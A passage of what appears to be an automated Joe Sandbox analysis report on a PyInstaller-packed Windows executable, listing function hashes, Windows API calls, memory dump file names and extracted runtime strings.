                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B141D462B1968289EE309B12A8412BA7394FF85BE0F040135DF8D97789DF3EE580C709
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B2D7
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B30D
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B33A
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B34B
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B35C
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B377
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                              • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                              • Instruction ID: bdaac7af94d41d578575a97c9ed01ecc0d517fbd05849839102e72cf7e74eb96
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68113024B0C64282FE58A7255E5B13D61529F497B0F248738ED6ECBAD6EE2DF4614303
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62C0F1B6A), ref: 00007FF62C0F295E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                              • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                              • Instruction ID: eb1945402f5b3ce93bd321c5c70b1af51b2f1e43aef729a147c8e485069f2159
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E313562B18A8146EF209765AC422E76294BF887F8F400132FE8CC3789EF7CD586C241
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                              • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                              • Instruction ID: 78f4a0f4665ebe558c9d8f4fe83a1ce740a31a568ba874358303eaf6e3a3ce4a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F319072619A8288EF20DB25EC5A2F96360FF887A4F440135EE4E87B49DF7CD145C702
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF62C0F918F,?,00007FF62C0F3C55), ref: 00007FF62C0F2BA0
                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF62C0F2C2A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                              • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                              • Instruction ID: 2cec8ca5f0b50406f41d5ca78096f05a42cdc10a41819766b9aadb76dc93387f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C821D162708B4186EB209B18F8467EA63A4EB88794F400136EE8D93655DF3CD245C741
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF62C0F1B99), ref: 00007FF62C0F2760
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                              • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                              • Instruction ID: 2465b6bc31d6e694cec9312289ad023290a5290f080061e0e327b4e5820cccf0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B21B072A19B8186EB20DB54BC867EA6394FF883A4F400135FE8C83659DF7CD2858745
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                              • Instruction ID: eb95f7f3f48f6a0bec1191f39e3fbdbb999db267ea4a3c974252f25e370276a8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCF0C261B08706C1FE148B28EC6F77A6330AF59770F440235DA6E866E8CF6CD144C302
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                              • Instruction ID: c0936150a246bbdc1847628288228c3b1f4df18014319b5539fea7cd5b03cd38
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09113322D68A8201FE54117EED9B37D1190AF79374E4C8634EA7E967DE8EEC6445C103
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B3AF
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B3CE
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B3F6
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B407
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B418
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                              • Instruction ID: 14cd283922234b1d585029a14ed1ac0fe22536fbb028d61e15a6918262ddd066
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1115E30F0D64281FE58A7269D5B27921429F457B0F588334ED7EC6BDAEE2DE5628303
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                              • Instruction ID: ba2ef1308fe9006bf9a1ef374012ed1dea6c46e84785928743e1045b93af50d1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02110524E4920781FD6CA2614C6B57E22824F8A770F184B34ED3ECA6D6ED2DB8614213
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                              • Instruction ID: ef05407b4b7fce76a600297e839262fe213be2094b9ebd134a9a78217a82eb1d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF91D472A08A5681FF619E24DC5A3BD3791AF81BA4F444136DE5D873D6DF3CE8258302
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                              • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                              • Instruction ID: 495537817798efd58c7886186beb64db9423c0621514f747653eb7dd892779cd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9381BF72E0C24385FF659F29895B27836A1AB11BA8F558035DE0DD7285CF2EE922D303
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                              • Instruction ID: 7423ddb91260109b893d9910f443cc667aa1400ac18253e2b175fc53b6cc337e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84518E36A197428EDF14CF15E844A787791EB44BA8F108135DE4E8B788EF7EE981C709
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                              • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                              • Instruction ID: 375ed67dc8ad28dc4d58ec569a2a90a070955ee2b5cd3aafd191282bf8908a82
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B617232908BC589EB609F15E8403AAB7A0FB85BA4F044225EF9C47B99DF7DD1D4CB05
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                              • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                              • Instruction ID: edc58648ded7facd108a0e871cda2938f405d4af8264a3fdfcef124654868754
